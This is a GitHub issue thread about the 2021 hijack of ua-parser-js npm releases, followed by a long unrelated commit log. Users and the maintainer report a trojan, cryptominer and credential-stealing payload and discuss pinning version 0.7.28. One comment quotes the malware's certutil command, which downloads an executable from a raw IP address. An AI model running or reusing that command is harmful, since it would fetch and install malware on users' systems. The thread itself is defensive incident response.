Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Security issue: compromised npm packages of ua-parser-js (0.7.29, 0.8.0, 1.0.0) - Questions about deprecated npm package ua-parser-js #536

Closed
SuperOleg39 opened this issue Oct 22, 2021 · 187 comments

Comments

@SuperOleg39
Copy link

Hi!

See a warning at npm - https://www.npmjs.com/package/ua-parser-js - This package has been hijacked. Please revert to 0.7.28

First question - Can we use range ^0.7.28, or it is not safe?

Second question - Will you create a new package, or try to remove hijacked versions and continue update this package?

@nypinstripes
Copy link

Ouch does that mean like there's malicious code in it or something?

@faisalman

@LyesIsogeo
Copy link

LyesIsogeo commented Oct 22, 2021

I just update package and windows defender block "ceprolad.a" a trojan. I don't have any internet access at the same moment...
The trojan try to execute in the cmd: "certutil -rulcache -f http://159.148.186.228/download/jsextension.exe jsextension.exe". The certutil -rulcacha -f download a .exe file.

@SuperOleg39
Copy link
Author

SuperOleg39 commented Oct 22, 2021

Update - ^0.7.28 range is dangerous, 0.7.29 version already published.

We all need to fix 0.7.28 in our dependencies.

@SuperOleg39
Copy link
Author

@faisalman i hope you can revert versions with vulnerabilities?

@KalleOlaviNiemitalo
Copy link

0.7.29 includes scripts that download and execute binaries. From the command-line arguments, one of them looks like a cryptominer, but that might be just for camouflage.

@alex-drocks
Copy link

alex-drocks commented Oct 22, 2021

Revert back to 0.7.28 all greater version are infected. My computer was infected this morning when i updated my docusaurus version.
https://twitter.com/DrocksAlex/status/1451543176779534342

NPM official flag: https://www.npmjs.com/package/ua-parser-js

@Tom910
Copy link

Tom910 commented Oct 22, 2021

The best solution is to publish the 0.7.30 version without the vulnerability. Then ^ will jump to the vulnerable version

@faisalman
Copy link
Owner

Hi all, very sorry about this.

I noticed something unusual when my email was suddenly flooded by spams from hundreds of websites (maybe so I don't realize something was up, luckily the effect is quite the contrary).

I believe someone was hijacking my npm account and published some compromised packages (0.7.29, 0.8.0, 1.0.0) which will probably install malware as can be seen from the diff here: https://app.renovatebot.com/package-diff?name=ua-parser-js&from=0.7.28&to=1.0.0

I have sent a message to NPM support since I can't seem to unpublish the compromised versions (maybe due to npm policy https://docs.npmjs.com/policies/unpublish) so I can only deprecate them with a warning message.

@KalleOlaviNiemitalo
Copy link

@faisalman did you use the "Report malware" button? I don't know how quick NPM support usually is but I imagine they might pay attention to that.

@ohanedan
Copy link

ohanedan commented Oct 22, 2021

I think we should publish new versions above that this hijected versions.

Like:
0.7.30
0.8.1
1.0.1

@SuperOleg39
Copy link
Author

I think we should publish new versions above that this hijected versions.

Like:
0.7.30
0.8.1
1.0.1

Little problem with that decision - it will be hard to remove this versions in a future.

So, ua-parser-js will need up version to 2.0.0, when want to push real updates

@benjilebon
Copy link

Extra carefulness required because it seems to be affecting linux machines as well, make sure the miner doesn't get installed in your servers & ci stuff

For now it seems to only hang in installing because the url containing the infection doesn't seem to be working, but it may not last

Linux users can use this command to see if the miner is running or not and stop it : ps -aux | grep jsextension

@ohanedan
Copy link

I think we should publish new versions above that this hijected versions.
Like:
0.7.30
0.8.1
1.0.1

Little problem with that decision - it will be hard to remove this versions in a future.

So, ua-parser-js will need up version to 2.0.0, when want to push real updates

That's right but it's a safest method I think. You can continue with version 2.0.0 and users don't specify a specific version will not be affected.

@faisalman
Copy link
Owner

@faisalman did you use the "Report malware" button? I don't know how quick NPM support usually is but I imagine they might pay attention to that.

Yes I've sent the report using that form, hope they can just be removed. Otherwise, I have to publish under new versions.

@aimozg
Copy link

aimozg commented Oct 22, 2021

This thing tries to steal saved passwords, cookies, and who knows what else. The sooner you can pull the plug the better, it doesn't matter if version numbers suffer a little.

@alex-drocks
Copy link

This thing tries to steal saved passwords, cookies, and who knows what else. The sooner you can pull the plug the better, it doesn't matter if version numbers suffer a little.

Does it? I'd have to change all my passwords.

@faisalman
Copy link
Owner

This thing tries to steal saved passwords, cookies, and who knows what else. The sooner you can pull the plug the better, it doesn't matter if version numbers suffer a little.

You're right.. Ok then

@aimozg
Copy link

aimozg commented Oct 22, 2021

This thing tries to steal saved passwords, cookies, and who knows what else. The sooner you can pull the plug the better, it doesn't matter if version numbers suffer a little.

Does it? I'd have to change all my passwords.

I've dropped the DLL it runs to a virustotal (before unplugging the ethernet): https://www.virustotal.com/gui/file/2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd/behavior
It reads browser user data files and I've checked "files written" against my infected PC, it does look like a script to export OS credentials and a copy of cookies DB file from Chrome

@gaelhuot
Copy link

We fixed it using this in our package.json :
"resolutions": { "**/ua-parser-js": "0.7.28" }

@faisalman
Copy link
Owner

I think we should publish new versions above that this hijected versions.

Like: 0.7.30 0.8.1 1.0.1

Done. Thanks for the suggestion 👍

@Cphusion
Copy link

Cphusion commented Oct 22, 2021

a solution that we're using to address this vulnerability is to set the resolutions in pacakge.json to use the last good version:

...},"resolutions": { "ua-parser-js": "0.7.28" },...

That resolution will come in handy when using a library that depends on the latest of ua-parser-js as opposed to using ua-parser-js directly in your package.json dependencies.

Dafnik added a commit to DatepollSystems/WaiterRobot-Web that referenced this issue Nov 29, 2022
smoroz pushed a commit to optimizely/ua-parser-js that referenced this issue Feb 3, 2023
* FIX: Wechat Desktop for Windows compatible with new version

* Move to check typeof for window for different envs

* Fix faisalman#413 Bug resulting Motorola model O

* Fix faisalman#367 faisalman#425 Detect Instagram in-app browser

* Add funding support links

* Fix faisalman#450 Sony Xperia Z2 Tablet

* Fix faisalman#454 Improve Samsung detection

* Add Nintendo Switch

* Fix faisalman#366 Amazon Alexa Echo Show

* Fix faisalman#339 Add Weibo

* Fix faisalman#407 ZTE Nubia misidentified as Nextbook Tablet

* FIX: new wechat desktop's unsafe regex

* Fix faisalman#433 faisalman#434 Huawei devices

* Fix faisalman#475 Nokia version incomplete

* Fix faisalman#470 Identify Android TV as SmartTV

* Latest Xperia lineup

* Fix faisalman#430 Playstation 5

* Fix faisalman#449 Lenovo Tablet

* Casually save some bytes

* Fix faisalman#401 Rearrange the order of regexes to improve hit-rate performance

* Fix faisalman#427 - Trying GitHub Actions

* Change mocha reporter for CI

* Action doesn't work, should be under /.github/workflows folder perhaps

* Fix faisalman#438 Add Zebra devices

* Update README contents & structures

* Enforce maximum limit to user-agent input

* Move documentation upwards and..mAkE tHe LoG0 BiG99eR!!1!1!

* Add CDN links & insert npm fund

* Fix faisalman#422 Add ARMHF in CPU Arch detection

* Fix faisalman#279 Remap old Edge versions <= 44 as suggested by @mikemaccana @callaginn

* Fix faisalman#448 Add AT&T & Vodafone devices

* Fix faisalman#209 Add CHANGELOG

* Add Electron

* Simplify Huawei detection

* Release as 0.7.25

* Refine some OS detection

* Add new OS: Raspbian

* Add Device: Surface Duo

* Add some test cases for Samsung, Huawei, Xiaomi

* Detect ARMEABI as ARM

* Casually save some bytes

* Refine some detection with more test cases

* Add new device.vendor: Vivo

* Fix faisalman#342 - Enforce all regexes to comply with safe-regex as a safeguard against possible ReDoS vulnerability

* Fix regexes that were marked as unsafe by safe-regex module

* Refine device detection with more test cases

* Add new device.vendor: Realme

* Release as 0.7.26

* Better tablet detection:
- Huawei MediaPad M/T
- Galaxy Tab SM-P
- Kindle Fire without Silk

* Better tablet detection:
- Fix lenovo phone / tablet detection

* Better tablet detection - Build.

* Better tablet detection:
- iPad using Facebook browser on some occasions
- More Huawei tablets
- Asus ZenPad Z8s (P00J)

* Small refactor

* Add new Engine & Browser: Flow

* Add new browser: Firefox Reality

* Add new device: Fairphone

* Add string check to setUA method

* Release as 0.7.27

* More test for latest phones with unique form factor (fold/flip/qwerty/swivel)

* Add new device & browser: Tesla

* Minor rearrangement

* More test for tablet devices

* Update contributor list

* Fix faisalman#492 LG TV WebOS detection

* Delete redundant code

* Refactor code: saving bytes towards 15KB minified

* Update readme: use https for demo link

* Test for Firefox UAs, add new browser: Klar, add new OS: Maemo

Source: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/User-Agent/Firefox

* Revert breaking fix faisalman#279 and release as 0.7.28

* Improve detection rule for Mac on PowerPC

* Improve device detection: categorize PDA as mobile

* Improve browser detection: Netscape with version

* Improve os detection: Windows Mobile without version

* Add new OS: HP-UX

* Add new browsers: Obigo, UP.Browser

* Add new device vendor: Roku

Source: https://github.com/WhichBrowser/Parser-PHP/blob/master/tests/data/television/roku.yaml

* Refine some OS detection

Source:
- https://www.zytrax.com/tech/web/browser_ids.htm
- https://developers.whatismybrowser.com/useragents/explore/operating_system_name/

* Remove oldEdge map

* Replace `\s` with space, saving ~0,3KB

* ES3 compat-fix: remove trailing comma

* Improve device detection: Huawei, Xiaomi, Realme, LG, OnePlus, ASUS, ZTE, Fairphone

* Improve CPU detection for ARM64

* Improve device detection: LG Android TV

* Add new OS: Android-x86, Deepin, elementary OS, GhostBSD, Linspire, Manjaro, Sabayon

User-Agent source: whatismybrowser.com

* Fix faisalman#500 Sharp devices misjudged as Huawei devices

* Fix faisalman#506 - add test for Huawei ART-L29

* Fix faisalman#509 add support for Internet Explorer 8

* Create SECURITY.md

A simple instruction for security researchers.

* Improve regex efficiency when trimming long ua string

https://blog.stevenlevithan.com/archives/faster-trim-javascript

* Add Huawei models

* Sony Xperia 1ii

* Samsung Galaxy S20 5G

* Add different oculus browser

* Oculus devices

* cleanup

* cleanup

* change to single line regex

* Enable to detect OPPO Reno5 A correctly.

* Securing the 0.7.x version (issue faisalman#536)

* Securing the 0.8.x version (issue faisalman#536)

* Securing the 1.x version (issue faisalman#536)

* feat: require the use of `===` and `!==`

* Update ua-parser.js

* ✨ Use AST to verify whether regexes are safe

* Bump version 0.7.31

* Fix faisalman#559: Sony Xperia 1 III misidentified as Acer tablet

* Fix faisalman#533: Detect Sony BRAVIA as SmartTV

* Fix faisalman#562 - Xiaomi Mi CC9

* Fix faisalman#561 - Increase UA_MAX_LENGTH to 275

* pr feedback

* v100 tests

* Add support for HuaweiBrowser

* update readme

* package.json: specify the folders to include

* add KakaoTalk App, KakaoStory App regex

* Add Kakao App, Naver App

* Add iOS Naver, Kakao regex

* fix browser-test typo

* Add LinkedIn app.

* Rename 'HuaweiBrowser' to 'Huawei Browser'

* Fix faisalman#565 - Add new OS: HarmonyOS

* Fix faisalman#558 - WeGame mistakenly identified as WeChat

* Increase UA_MAX_LENGTH to 350

* Fix faisalman#532 - Detect Xiaomi Mi TV as smarttv

* Fix faisalman#513 - Add new browser: DuckDuckGo

* Fix faisalman#516 - Add Focus into list of possible browser.name

* ci: add GitHub token permissions for workflow

Signed-off-by: Varun Sharma <varunsh@stepsecurity.io>

* fixed sony bravia smart tv, added sharp AQUOS TV

* Safari and Mobile Safari began to include commas in the minor version numbers.

* Fix faisalman#502 faisalman#580 : Add notice for desktop device type

* Refine small redundancy

* Fix faisalman#596 - Detect Galaxy Tab S8 as tablet

* Add test case

* improved documentation

* Bump version 0.7.32

* Add new browser: Cobalt

* Fix documentation

`readme.md` refers to a `parser.getResults` function, which does not exist. This PR corrects the function name to `getResult`.

* Support Panasonic Viera Smart TVs

* Support Panasonic 2018+ smart tvs

* Add test for panasonic 2020 smart tv

* Add test for panasonic SAT receiver

* Support Loewe Smart TVs

* Add tests for JVC smart tvs

* Support philips smart tvs

* Add samsung testcases

* Add support for TechniSAT TVs and SATs

* Fix faisalman#605 - Identify Macintosh as Apple device

* Remove unsafe regex in trim() function

`trim()` function contains a regular expression that is vulnerable to ReDoS but was uncaught by `safe-regex` module.

* Bump version 0.7.33

* Fix faisalman#557 faisalman#612 faisalman#629 - Update the changelog

* Fix faisalman#621 - Detect Oculus Quest Pro

* Utilize navigator.userAgentData as a fallback faisalman#588

* Improve Kakao/Naver detection + add test

* Fix faisalman#619 - Move Sharp up to be checked before Huawei

* Rearrange the recently added smarttv detection

* Fix faisalman#620 - Add new Device: Kobo

* Fix faisalman#601 - Detect Chrome OS without version

* Update manifest

* fix: Don't act as a jQuery plugin

* build: 0.7.24 custom version

* Rebuilt min versions

---------

Signed-off-by: Varun Sharma <varunsh@stepsecurity.io>
Co-authored-by: ruicong <466403866@qq.com>
Co-authored-by: David Annez <david.annez@gmail.com>
Co-authored-by: Faisal Salman <f@faisalman.com>
Co-authored-by: sUP <dani3l@gmail.com>
Co-authored-by: o.drapeza <o.drapeza@tinkoff.ru>
Co-authored-by: liujunlve <liujunlve@henhaoji.com>
Co-authored-by: Ziding Zhang <zidingz@gmail.com>
Co-authored-by: Paris Morgan <paris@8thwall.com>
Co-authored-by: Ryohei Shima <shima01dev@gmail.com>
Co-authored-by: chenhui9279 <chenhui9279@autohome.com.cn>
Co-authored-by: sunny-mwx <30586210+sunny-mwx@users.noreply.github.com>
Co-authored-by: Hans Ott <hansott@hotmail.be>
Co-authored-by: XhmikosR <xhmikosr@gmail.com>
Co-authored-by: KnifeLemon <role___play@naver.com>
Co-authored-by: Dante <duanjl.china@gmail.com>
Co-authored-by: JBYoshi <12983479+JBYoshi@users.noreply.github.com>
Co-authored-by: Varun Sharma <varunsh@stepsecurity.io>
Co-authored-by: Jacky Choo <jackychoo@adly-macbook.local>
Co-authored-by: nabetama <mao.nabeta@gmail.com>
Co-authored-by: kNoAPP <alldoneb@gmail.com>
Co-authored-by: Mok <mok@moekm.com>
Co-authored-by: Oscar Becerra <oscarbecerra@google.com>
Co-authored-by: Riley Shaw <rileyjshaw@users.noreply.github.com>
Co-authored-by: Garrit Franke <garrit@slashdev.space>
Co-authored-by: Garrit Franke <32395585+garritfra@users.noreply.github.com>
Co-authored-by: smoroz <smoroz>
Co-authored-by: Spencer Wilson <spencer.wilson@optimizely.com>
Co-authored-by: Luis Rivas <luis.rivas024@gmail.com>
@faisalman faisalman unpinned this issue Feb 20, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests